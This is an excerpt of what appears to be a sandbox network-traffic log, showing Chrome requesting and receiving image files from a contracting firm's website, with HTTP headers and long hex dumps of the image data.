                                              2024-09-27 06:20:17 UTC8000INData Raw: b8 db 93 c5 d9 75 5e cb 77 4c e4 23 9b b1 b1 7b 4a 7c ed 90 ef d5 46 7b 08 6c 8e 39 f5 df 6d be b2 cd 4a e6 49 ac 0e ba f3 41 ef 21 34 4a e3 8d d1 81 fe e7 6c c1 fe 73 22 10 ab 8d 3f 79 09 32 45 ce ec d4 6b ee e4 9f 59 a7 21 2d 33 6a 75 47 f6 0f bc c2 b7 5f 4a 99 25 16 f5 92 50 73 80 f1 8c ea ce 35 c8 b4 3d a5 9e 8e 00 1a fa b6 1e c2 b0 8b 66 74 1d 08 89 76 2e f7 5f 0d 7b 12 20 3f 5b be a0 2b 75 9e f5 73 94 1a 57 56 ac cd f6 ab 0b 57 0a b8 67 ae 2a bd 90 f0 13 cd 55 43 f4 f5 46 fa c3 4f 09 03 32 16 24 a0 2b 1b 0c 5f ae 4e b3 68 c1 4f c0 7e 47 07 71 86 54 77 1b 21 ba ca e6 25 51 1d 60 a8 c3 b3 7e 15 d3 8a 6a d2 40 1e c6 8f 4c 05 f7 c0 c4 88 5e 69 23 a5 f2 51 12 ab 0b 5d 8f d7 14 03 52 f1 ba 6f 50 62 1e 50 79 8e 18 a2 6c 94 c1 70 5a e5 f9 c3 f9 53 84 54 88
                                              Data Ascii: u^wL#{J|F{l9mJIA!4Jls"?y2EkY!-3juG_J%Ps5=ftv._{ ?[+usWVWg*UCFO2$+_NhO~GqTw!%Q`~j@L^i#Q]RoPbPylpZST
                                              2024-09-27 06:20:17 UTC7093INData Raw: 4e 5b 15 f2 8a bf 39 ea 94 dd 44 ee 0a bd 97 5f bd a4 0b 8f 9b 43 78 4a df 32 a9 c1 3c 22 a5 63 e2 17 4b 5a 9e 8e b2 35 de eb 78 c9 76 a3 95 10 54 64 ff 8a 27 86 fd 27 73 a7 04 af a8 9b 3a 2a 10 7e 74 49 36 72 d3 9e 1a 45 72 89 38 3f 4c 32 c3 45 c3 62 8a 52 6a 59 83 8c 4b cc ba ce 39 a2 0c 2b 30 89 ea 13 4e 82 69 2a c5 e7 c6 9d 59 32 7b cb db 9b ec d9 e6 ae 0f e5 b5 89 d9 cc 9a c3 f4 b6 3f 10 42 15 36 da 97 4c 25 b3 ae e8 2f e6 58 82 ca 57 9d f1 bd 96 4c c9 2d 0c 85 86 e7 62 f1 78 db 27 83 f9 96 a1 e3 60 81 c7 84 4f 40 18 63 7a 8c 44 b1 42 f9 c5 30 c6 6b 73 b5 62 df ab a8 22 89 e4 00 14 80 76 f4 36 60 7c d1 9d 36 a6 ad bb 7b 72 e2 1b 35 84 8f eb 6c 3b 1a c2 1c e7 79 c9 d1 34 a3 aa 89 93 19 4b fe 3f 31 c3 28 f1 54 45 0b 36 b8 00 00 08 ee 33 32 65 d6 5b 48
                                              Data Ascii: N[9D_CxJ2<"cKZ5xvTd''s:*~tI6rEr8?L2EbRjYK9+0Ni*Y2{?B6L%/XWL-bx'`O@czDB0ksb"v6`|6{r5l;y4K?1(TE632e[H


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              97192.168.2.465432173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC464OUTGET /uploads/projects/8/0c298f1956a31b39bf820e0dd7ec632b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:18:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 70462
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 36 13 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 c2 12 01 00 b0 96 05 9d 01 2a cf 04 a3 03 3e e9 6e ae 52 29 26 29 af a6 b7 0a 39 f0 1d 09 63 4b 96 72 eb ea d4 f2 93 6a 62 fc 5b 78 e8 71 06 6b d0 7b e6 ff 09 d6 29 e8 7c 27 c8 ff 93 ff 15 9f 1f 6d b5 f0 fd a7 af bf fa bc 89 f8 df fd 5f bf fe c9 be fb fe df ef cf 69 3e a1 7f aa 7f f8 f4 ff f5 41 ea 8b 9e cf cd 7b ff ff 57 d7 af 06 f5 d7 f6 3c 91 1f a3 79 43 fa 4f f5 fe 08 fe 8d ee f7 ba 15 fa fe 9b c1 3f 8e 5e bb ff d6 f0 07 e7 17 d4 de c1 7f 9b f9 05 f2 ff c1 f7 7e ff ad e8 29 ee 47 e1 7f fd 7a ee fe e7 9d 5f db ff bc f6 03 ff 15 fe db d7 5f 06 4a 03 7f 56 ff 77 eb 29 ff 6f ff ff fd 3e ad ff 6a ff bb ec 37 fd 73 fd 87 ff ef f6 dd ba ca 4c 19 b7 99 ae ff
                                              Data Ascii: RIFF6WEBPVP8XVP8 *>nR)&)9cKrjb[xqk{)|'m_i>A{W<yCO?^~)Gz__JVw)o>j7sL
                                              2024-09-27 06:20:17 UTC8000INData Raw: f3 d3 7c 8f 9c 6d b0 48 69 66 c0 12 f5 20 59 df 1d 04 07 cc 42 f5 76 53 0d ce d1 1a e1 66 cc 79 00 75 bb c6 2c b5 93 0f b6 89 16 11 98 bd e4 a7 53 1c 67 5b 1e 50 6c 87 c6 37 12 5f 07 37 ef 63 48 a3 e5 ba c0 1d b2 0c f6 e6 0f a3 69 a9 4b 0f 0b 40 cd 32 6c eb 3d 4b a2 55 2f aa 7c e8 11 f5 2b 51 65 e7 2c 92 73 d1 ca 3d b2 4f 79 e4 d6 fe 32 40 79 ec 44 a1 2a 0b cf 24 c9 f0 b0 78 b0 b6 dc af 01 13 39 12 91 e1 22 ef 67 43 21 d3 65 c4 9f 56 ff 7e aa 76 71 76 64 3e 79 f6 fb ef 5f 4f 69 75 37 56 9f ae 01 92 fc be b4 a5 76 27 35 07 af 01 4b 95 39 12 3a be 81 07 0d 24 94 55 6f 1c fa dc 19 69 b6 8f e0 52 65 10 fa c1 2b fa 59 c1 c9 39 a6 17 d6 8f 47 c5 d3 c6 46 e9 c9 51 b4 66 e6 7a 77 2c b8 38 f6 63 7e 87 9b b5 11 5b bd 6d 4a 7a 8b f4 b4 84 74 79 bd 87 57 9f a5 bf aa
                                              Data Ascii: |mHif YBvSfyu,Sg[Pl7_7cHiK@2l=KU/|+Qe,s=Oy2@yD*$x9"gC!eV~vqvd>y_Oiu7Vv'5K9:$UoiRe+Y9GFQfzw,8c~[mJztyW
                                              2024-09-27 06:20:17 UTC8000INData Raw: 70 ce 53 88 99 9b 46 3a cb 27 64 f8 8f 14 71 94 cb bd 68 ed d0 32 b2 56 da 1f 42 32 7e bd 4d a1 36 41 fa 64 42 50 9e b3 6a e3 3a 2b 52 97 0a 67 53 be 81 c5 ec 98 80 7d ff 97 0d 02 b7 a8 c6 49 38 58 f8 3d 97 f4 50 7f 1b 37 76 4a 9b 4e be 76 72 93 c8 df 9c e1 c4 75 83 f0 7c 8e 2b 89 5d e9 9c 35 ee 6d 8e e5 0c 3a 19 a7 75 1f 1b c0 6e 66 c2 81 01 68 34 e5 20 77 ff 93 93 5c 91 9c 75 7b c4 4b 19 e2 45 22 ec 4d d3 66 d8 4c 83 ea 75 84 ca 4a f0 49 9a f5 7d 8f 29 cc 0f 55 33 84 80 41 22 3d 8b a3 1b 4a 0d 17 61 8d b7 b8 57 be 29 70 fd 08 d6 47 a1 ae 37 80 9c 3d 40 13 24 f6 7c e8 88 f0 38 09 d8 cf 19 c2 80 cd e0 a9 41 1e 01 93 35 b2 f5 95 06 aa 26 7c 86 1d da 53 a5 b6 29 1b 73 17 b3 81 1c cd 7b ba 9c 9a 72 06 b3 75 05 0a 46 6b ea 78 52 e3 d2 e9 16 3d ad 51 94 2b 0e
                                              Data Ascii: pSF:'dqh2VB2~M6AdBPj:+RgS}I8X=P7vJNvru|+]5m:unfh4 w\u{KE"MfLuJI})U3A"=JaW)pG7=@$|8A5&|S)s{ruFkxR=Q+
                                              2024-09-27 06:20:17 UTC8000INData Raw: 83 e6 62 48 f6 4d 21 c1 1e 5c 99 17 79 bd 80 66 9b b9 93 be 07 0d 20 72 d4 ea 93 b8 b2 e9 66 6e 0b 2b 19 80 ed 04 60 ce 9d 0d c9 84 b3 a9 b1 1a e4 b1 43 74 3c 1e 8f d2 18 08 82 42 f0 25 f4 16 fd fe 6e 91 64 66 a3 98 92 40 c3 3a bd 85 a6 70 26 72 9c a1 80 11 b8 2d 60 84 03 62 92 f5 90 31 b9 b2 0f 56 4f 3b 3c 92 1c 13 33 85 61 8a f1 cf 65 fb 81 ad 5c 36 6c 2b 09 c6 d1 e0 44 00 8d 78 6f 56 df 68 95 2d 3b 45 dd 8d f6 52 43 74 1e ae ab a9 2e ad 7b e9 07 46 d3 6f 56 5c a2 2d 77 a6 c0 07 ad cc ee 25 9d f5 89 33 c4 92 eb 62 76 8b 39 e3 d2 f4 1b e2 f8 9a 01 f9 66 24 52 22 78 e2 87 3b cb 96 5d 20 60 76 27 26 84 69 3b 05 fa f6 66 ae 9d 31 bc 00 1f a4 a3 d3 d3 1c 55 0e af e5 94 ab ed e7 21 bf 69 63 59 83 e3 c9 93 6d f2 cd 20 41 76 75 26 f0 d1 75 54 0c c2 e3 80 bd d2
                                              Data Ascii: bHM!\yf rfn+`Ct<B%ndf@:p&r-`b1VO;<3ae\6l+DxoVh-;ERCt.{FoV\-w%3bv9f$R"x;] `v'&i;f1U!icYm Avu&uT
                                              2024-09-27 06:20:17 UTC8000INData Raw: 64 ba e2 63 28 47 5f c0 d6 6d d4 b8 5c 43 15 23 d9 b3 c9 08 d4 dd 52 d1 b3 87 b0 ba c6 54 f8 35 1e 83 c9 64 e9 d1 71 6d 93 df 2d 2a e7 2c 21 70 d9 e2 aa 31 c7 35 e6 28 85 d6 06 07 94 9b 7e f0 b0 11 ac e4 50 c5 d0 0d 8a a9 0f fc a5 7d 42 d0 b5 ba 1c 7a 42 e0 90 37 a3 13 b2 58 c9 58 7c d1 0b a0 5c 37 2e a6 28 e3 97 01 78 d8 cc b1 be 83 76 15 41 6d 31 2b cb aa e6 de f6 b9 99 5a 06 42 31 4c f8 ed 7f 62 79 7f 9e 61 f7 be 1d 35 96 b9 70 f9 86 20 d1 a1 49 36 8f 15 a7 07 7b 3e f3 19 d9 59 56 5c f7 b8 cd 50 ab 74 2a b0 3a 1a d7 f2 c6 33 28 18 7d 75 ae 1d 27 61 e8 57 85 5e c9 a7 08 60 f1 28 84 91 48 33 47 48 0a f6 85 0b bc 09 49 34 44 6d 05 26 d8 bb b1 4b 37 b0 1f fe c2 7c cc 11 d1 6a 1a 5c 62 39 36 d3 92 3b 03 a2 4b 56 1f 21 92 b9 56 a8 a9 8f 6c 20 01 78 bb f5 bb
                                              Data Ascii: dc(G_m\C#RT5dqm-*,!p15(~P}BzB7XX|\7.(xvAm1+ZB1Lbya5p I6{>YV\Pt*:3(}u'aW^`(H3GHI4Dm&K7|j\b96;KV!Vl x
                                              2024-09-27 06:20:17 UTC8000INData Raw: b8 44 63 72 3f f0 46 eb 94 dc 7c 6f 6a 8a 5f 4d 77 25 71 99 f6 11 37 2e 63 e5 b1 e3 fd 79 f3 a8 f0 a4 39 5a 04 fd 2c 1c 63 50 c7 4d aa bf 63 22 bf bd cb 90 11 c3 92 9c 7a ee bf aa 8c bd 2d 4b 99 47 9a 06 89 c6 29 80 25 82 7a 5e c0 01 a3 a6 67 1f 46 ae ec 6d ef 9f 88 c1 3d 66 a0 78 33 da 7f 17 80 b5 da 82 8f d4 fc 7e 05 3b 8d bc d9 bc f3 7d aa ad be 44 41 b8 d5 06 08 d7 48 7c 65 05 0a 38 3e 58 76 d9 6c 06 8b 19 28 59 8a dc e9 38 72 f3 2b 8b f8 c2 37 9b 26 ce db 04 a1 e7 66 61 9d a9 21 ba c0 cc 02 44 ec 37 5b d7 6b 7d 9c 93 59 84 75 13 48 20 2f f4 d7 3d c5 03 e6 ac d2 04 6b ba 46 b1 04 c1 55 4d 07 44 2c 9b 82 32 de 37 26 17 32 ef 64 07 f5 3e ce b6 25 20 58 41 e9 53 90 cf 73 2b eb c3 9c ab 31 68 50 28 c8 61 0d 5e 57 1a a5 a3 aa 26 91 57 2e 91 86 13 2c 3b cb
                                              Data Ascii: Dcr?F|oj_Mw%q7.cy9Z,cPMc"z-KG)%z^gFm=fx3~;}DAH|e8>Xvl(Y8r+7&fa!D7[k}YuH /=kFUMD,27&2d>% XASs+1hP(a^W&W.,;
                                              2024-09-27 06:20:17 UTC8000INData Raw: f2 c1 13 00 6b a4 60 92 24 c3 90 a9 a3 c7 34 bf e0 b9 0b 8b 0f d4 3b 53 91 98 3b ed 0e 53 15 01 88 dc 69 01 41 aa 43 c2 c9 bb 6c f8 3a b0 85 7b df 8a 93 c0 0f 92 14 fe e4 d6 64 05 e2 bc 0c db cb d6 f1 a0 b7 fc b9 05 5c 7b 2d 38 c1 6a d9 5a 41 9a 7a d4 87 80 c1 31 04 02 04 67 11 97 09 81 7a e6 b9 8a 0a 83 44 23 bb 99 78 2e ff 6d 9b 7d 4a 8d f7 0a a1 4d 24 7d e6 06 42 e2 e1 fa 43 88 7d 00 53 98 7f c6 50 33 e0 8a 72 65 c3 f5 04 73 3c 3a e4 1b 0a 88 5d 26 bf 70 a9 11 b9 12 89 3a 69 4e 96 e7 52 c4 31 0c 25 72 e3 95 47 fa ac 16 7d 63 74 dc 8d 67 0e 7c 35 ad e5 e8 d2 b8 52 c1 c5 4e 8a a0 3b e5 74 15 52 ab 21 c2 dd 3c 53 52 19 b5 2f 1c db 77 00 e4 20 a3 c7 1c f5 37 90 96 91 5e 1c 8f 06 2d 68 b3 e9 df 3b a6 f4 fa a3 54 03 26 39 08 95 84 b5 cd 7b e2 f7 88 b3 90 09
                                              Data Ascii: k`$4;S;SiACl:{d\{-8jZAz1gzD#x.m}JM$}BC}SP3res<:]&p:iNR1%rG}ctg|5RN;tR!<SR/w 7^-h;T&9{
                                              2024-09-27 06:20:17 UTC8000INData Raw: fe d9 c4 a0 d6 c9 ae 8a 70 21 1a c3 b7 98 54 8b 22 ab 3f e2 3b 84 93 1c a0 3f 04 77 16 79 0b 29 4d b9 1e 66 39 4b fd 92 6e de 74 db 5f fb 08 4f 79 11 7e 23 7d b3 95 5a 20 a0 3f da a4 25 71 bf 6d 8c 77 ed 8e cb 3d 2b 02 b5 cb 3c a3 ef 6b 64 79 42 54 fe 68 2f 7b 25 d3 9f 9b 52 d6 a2 6c b4 99 89 36 35 ad 34 8e 45 ea e6 46 99 7a 2d 56 0c cc 5f 0f db a5 57 2b 04 95 43 bc 46 f2 8b 56 f3 e6 39 fa 8e 0c 5d a7 dd 2f b7 d3 ea 8f 46 42 6a 32 43 90 bf c1 2b 2d 28 57 49 5e cb 75 29 7f b2 ba 1d 5f e0 33 b0 7a 28 c9 17 70 c1 b2 69 e1 ac b8 a1 4c 89 99 52 98 a1 47 96 32 f3 b0 63 a9 be 62 72 26 44 b7 bf 72 ed b4 79 bc d3 60 f2 ac 09 1b 8e b9 c6 2f 01 6f 46 22 bf 24 3d 47 43 80 18 17 5c 27 32 81 d1 e9 4d 61 cb f6 d0 3f 27 f3 68 11 c5 c3 38 7c e0 ef 35 15 a7 b6 b9 0d 3f 48
                                              Data Ascii: p!T"?;?wy)Mf9Knt_Oy~#}Z ?%qmw=+<kdyBTh/{%Rl654EFz-V_W+CFV9]/FBj2C+-(WI^u)_3z(piLRG2cbr&Dry`/oF"$=GC\'2Ma?'h8|5?H
                                              2024-09-27 06:20:17 UTC6531INData Raw: a1 2d f9 b4 fa 68 e8 a1 f2 2a 60 0b 02 d4 ad b8 4d 85 2e e4 f7 fa 9f d6 3f a3 34 54 53 53 61 c4 e9 c2 a4 1b a7 4b fb 94 9a c6 91 e0 78 67 96 2e 6b e5 bb 22 0b df 19 4f e1 af 9d 1f 0b 1e e3 57 eb 73 62 21 e7 1c 64 c3 1c eb 8c d2 ff e7 ea 94 91 68 a8 3f dc 44 16 9e f8 09 40 31 b9 99 92 74 f0 17 ad ad 64 bf 34 36 7a 33 28 5a 5b 05 94 aa 67 ea c0 db 0c 43 d4 c3 e0 66 58 36 6d ee 26 2a f2 e4 93 be 8c c7 61 4f ee 4d fb 32 e7 bb 35 16 24 f9 e9 26 46 64 48 54 70 83 61 0c 4c a1 ac 7e 17 7c 29 01 52 ec e8 b9 e8 e5 a6 24 4f d2 76 cf 55 e1 2d 1f 4a fd 2a c3 35 0f 7c bf 7d 8c fd e2 23 31 2d 36 bc 4f d7 c1 65 07 19 81 de d4 7d 89 04 30 74 9a 4d 75 91 f4 69 5c 95 a9 03 97 23 2d d5 31 47 39 4f 55 d8 2d 6a c4 45 46 e3 4e ef fa e1 9c b1 3a 74 42 8f ca 75 12 2f e5 ca 72 18
                                              Data Ascii: -h*`M.?4TSSaKxg.k"OWsb!dh?D@1td46z3(Z[gCfX6m&*aOM25$&FdHTpaL~|)R$OvU-J*5|}#1-6Oe}0tMui\#-1G9OU-jEFN:tBu/r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              98192.168.2.465437173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC723OUTGET /uploads/projects/31/4a98fa9bd66caf02803bed595073351f.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Sat, 14 Jan 2023 13:23:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 465135
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:17 UTC7930INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 62 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Duckydbhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:17 UTC8000INData Raw: f1 ee f7 f7 fd cc fd 26 2a fa f0 ec f9 fa 2e 31 d2 8f af 3f 3c f3 f5 b2 f2 7a 3d 0f c3 eb d7 6e ba da 6c ca 4e 77 61 8d 72 1f 53 e7 7c 89 f5 be 37 cb 7e af 99 6d fd 43 f8 dd c7 93 e9 dc 7e 2f f7 9c a7 f3 ef d8 c5 f5 f3 bb fd 37 c9 b4 e1 eb f1 ff 00 cf fd ff 00 9c 3e 47 d2 fa 03 c3 e1 eb 78 f8 3c d7 b7 6d bd 7b 7c f1 f4 27 44 e7 e9 3c 3a fd 4f 8d f2 3d 24 e9 ae 23 1d ef bd 1c 3c e7 a7 1d 4c 7d 3d df 97 84 f3 e7 e2 ff 00 a1 fc 87 dc 1f b1 fc df 98 fe 2f f4 1e 3b f9 af b3 cf 6b d1 ca fd 5f 1f de 9f b6 f8 bb fd 7e 4b ef 4f 87 d3 fd 5e 38 9a cd ae 35 e5 5f 1b f4 7f 51 7e 43 f7 7c 57 46 dd 79 6b bb 73 e3 7a 59 1d 39 d2 f8 fd 3e 6f e8 e5 d8 fb bc 15 bc 7b cc f6 7c 0b 7f 99 f7 97 e7 7f 67 cf f9 fd 34 13 34 3c af 7b 8e 9d 6f 7f 26 cf df 7e 3f 95 fb 9f 17 f3 8d f1
                                              Data Ascii: &*.1?<z=nlNwarS|7~mC~/7>Gx<m{|'D<:O=$#<L}=/;k_~KO^85_Q~C|WFykszY9>o{|g44<{o&~?
                                              2024-09-27 06:20:17 UTC8000INData Raw: 9f 35 9e f3 b3 58 89 58 1b 97 09 6a b3 b8 b9 b5 52 c5 8b 29 a8 4a e2 2c 43 ca 14 ba cd 26 e9 77 99 24 4b 30 b2 ce 5d 91 5f 63 36 44 f9 51 81 9d 6e 3f 3b 3f a0 7f 3e e1 fa 67 9b ed 79 7e fc e8 f5 76 6b 19 59 b6 f3 cf 59 cf 79 ca cf 66 e1 e4 f6 8f 0f d4 92 d6 25 bf 3e d2 f1 d3 6c b2 97 1a c7 58 9e bb ec dc 45 d6 73 ad 2c c8 b6 3e b3 b7 3a 8b 71 77 3a 48 9a dc b1 d2 c7 1d 2e 39 f6 a9 df 2d 63 96 5a ed 6b a1 c7 6e 57 af 9e 6c af 3a af d4 e7 f5 8a 7d 63 9f b8 8e b4 f2 55 54 68 85 33 19 ad 26 b4 90 d6 19 ba a6 b7 e7 a4 cc 6b 29 42 2e b3 12 f3 8d 64 ec e8 23 5c 4f ce e6 cb 68 93 ee 6e a3 b0 ce fb 9c 75 bd e1 de eb cd e8 ed 7e 17 d7 b5 f1 fa b5 b5 c0 fd 2f 07 1f f4 bc 5e a1 e1 fa 19 79 7d 18 f9 7b 3c ef 4e b3 23 a7 2e bf a6 32 de 61 6a 4d cd 52 d6 e3 74 b2 eb 4c
                                              Data Ascii: 5XXjR)J,C&w$K0]_c6DQn?;?>gy~vkYYyf%>lXEs,>:qw:H.9-cZknWl:}cUTh3&k)B.d#\Ohnu~/^y}{<N#.2ajMRtL
                                              2024-09-27 06:20:17 UTC8000INData Raw: 25 94 7e 44 8d 29 1f c8 7a d0 d8 d4 fc 81 0a 75 a1 e6 b4 57 c7 6c 79 96 a7 35 b5 e6 9c c7 1a 9c b5 9b 98 6a ad 96 f7 b6 6f 8c 61 c2 76 76 35 ef dc 4d fe 3a ed 1b 6a e3 6e b6 fb e1 ad 18 5b 6f 0f bb ad ca 6b e8 d3 cc 78 f5 df ce 71 30 d0 fc 77 47 8c 51 ca ee f2 14 f1 da 95 7e 4b e1 76 b9 0b ad 9d 6b a5 bb 7f c8 fe e4 63 61 6c c9 62 d1 d7 f1 3e 27 9d f1 eb 23 57 1b 7e 8e cf c7 39 15 aa 9d 5d dd 18 59 bd 1d 5f e3 ed fc 71 a1 a5 c4 f9 2f 2f e3 9e 37 7c 97 95 f0 8e 2f 80 5b fc 12 85 d4 da f0 3d be 42 5a 3a 32 85 5a 68 91 fc 85 e4 1a d2 5d 6d fa fb 96 77 38 ee 2e ed f8 9a 7e 4f 1d 24 87 90 f3 a8 6b 79 d7 93 d1 c5 78 e7 37 2e 77 f1 bf e1 da f6 d7 8b fc a9 5f 2b 23 92 ff 00 99 d5 b3 ca ee f9 bc 79 bd ad ff 00 3c af 9e e4 f6 7c e1 77 f9 6b bf 22 47 9c e6 ef fc 8a
                                              Data Ascii: %~D)zuWly5joavv5M:jn[okxq0wGQ~Kvkcalb>'#W~9]Y_q//7|/[=BZ:2Zh]mw8.~O$kyx7.w_+#y<|wk"G
                                              2024-09-27 06:20:17 UTC8000INData Raw: e8 2c 51 78 fb e5 05 d7 b2 b5 ed 09 5a b2 2a a1 fe 39 8b 4e aa 45 32 2e da 8c a1 44 51 49 51 b7 5d ba f7 de 9a 71 f8 b5 c9 2f e3 6a 49 6d 50 b6 f6 ab 94 aa e3 68 b8 87 0f ac ff 00 c3 c2 bb bf e3 72 9a ae 9f 1f a8 6c 72 fe 35 ab 1a f9 4d 5d c2 70 f2 7b a3 57 11 ce 66 be 33 46 cd 3a 7e 1d e3 da a9 1a e3 54 1b 21 21 13 d9 fe e1 54 55 59 2e c6 ee 96 99 df d4 94 2a f3 6d 6d ad 9e 42 fd cf 8b c6 a7 97 46 fe 63 89 d3 e5 8d 5a fc 6b 89 a1 79 fe 0f 4e 57 79 73 96 f9 36 dd 85 9c 9e d5 c4 a3 b7 61 f1 2c 3b 15 22 63 aa 87 c8 bd b5 b9 3b a4 2d b6 11 dd 8c 27 f3 2c 9c ab b9 50 86 cd ca 26 c5 d1 9c f6 92 4b 3d aa 35 92 7b ba 50 48 ce 0f 2f 7b 16 cd d8 2d bc 8d 94 d7 2b ed 42 ab 76 6c ae 1f c9 2d b7 6b 72 5d d6 dc ae 29 b5 c8 cc 84 76 bb 6b f2 1a 3b 3b 10 8d fb 8b 1d 7d
                                              Data Ascii: ,QxZ*9NE2.DQIQ]q/jImPhrlr5M]p{Wf3F:~T!!TUY.*mmBFcZkyNWys6a,;"c;-',P&K=5{PH/{-+Bvl-kr])vk;;}
                                              2024-09-27 06:20:17 UTC8000INData Raw: 87 4a 09 56 bc 4a a8 de da 37 39 3e 0f 89 b3 73 cf b8 bd 64 de 9f 90 73 db 9a 1f 8f ed bc d4 f0 ee 37 56 17 f1 fa b6 a5 5d 9a 65 f3 22 59 b3 5e 9d 73 b3 8f de 85 9b 90 81 2d 8b 6c 85 9e e2 d7 61 19 c9 53 ed 54 4b 10 45 54 5c e0 83 64 4e 48 90 8f 72 70 9c 67 05 67 49 d7 f6 c5 3d e9 d9 b6 10 4d 84 94 51 1c 9c 88 e2 8a b6 d3 12 77 55 15 f9 f4 34 b7 6c b0 96 cc 91 27 35 79 da 77 da 2b 33 e4 20 b6 2c 84 51 1c 84 54 c1 ce d4 e4 76 4e d7 bf c7 53 b5 89 1a e2 a4 be c9 2c d4 8e 06 0a d4 ad f6 5f b9 0b 74 e7 b9 5a 26 d6 ae b6 df 21 77 23 b1 b7 a8 6b 4e cb 0e 07 86 df 9a ff 00 1f 5c ab af 4f 53 5d 31 92 ce 76 ca 2a 95 2c 12 b5 59 4e db 28 51 76 60 95 ad af 29 ed 62 bf c8 53 14 9e da a1 7e e6 4a 9b 12 41 37 14 9e e7 b2 72 49 dd bb 97 4a d2 5b db 16 d7 4d fb ca b7 d1
                                              Data Ascii: JVJ79>sds7V]e"Y^s-laSTKET\dNHrpggI=MQwU4l'5yw+3 ,QTvNS,_tZ&!w#kN\OS]1v*,YN(Qv`)bS~JA7rIJ[M
                                              2024-09-27 06:20:17 UTC8000INData Raw: 11 f7 54 ae 6a 7c 6b 95 7e 35 84 e3 24 e8 8b ec 22 38 c2 bb 11 14 a9 3d e0 aa 85 52 43 4d e0 2d d5 a1 b1 bb 5d 31 db ba 56 5c 33 89 15 7e 92 53 27 11 fa 41 05 89 fd a6 67 75 09 2a 0a 21 f5 46 10 aa 58 1a d2 9a d6 b0 82 9b 1b 15 d2 ab b3 61 0d 9b 90 af 66 c5 55 5f b6 a8 a4 a3 af 55 4b 39 d7 ac 91 4e c1 4a 54 b5 dd 54 65 6d 94 a3 4b 46 b2 aa 59 16 0a f8 ab 24 55 ae 4c 4a 9e 6a 95 4d 45 8c c5 a5 1a d9 a4 0b 36 49 7b af 44 9b 47 45 73 e4 48 fb ac 69 ae 55 59 5c 63 3b b0 a5 63 ff 00 6d 91 22 e8 22 a2 98 b8 b2 c4 4b a0 55 c8 46 24 b6 d2 72 87 22 7f 23 14 17 76 0b 3f 9d 59 2d e8 b7 cb 99 2d 97 3b b1 25 37 58 72 12 6f 97 64 cd 7b 6f 91 09 d8 f1 9e 30 cd 96 db 97 18 4e d1 67 35 36 af d9 98 9d 12 d2 b8 fd 90 8a 22 7d 05 fa 30 c4 50 61 6b 92 a5 83 8e e4 50 ae 13 15
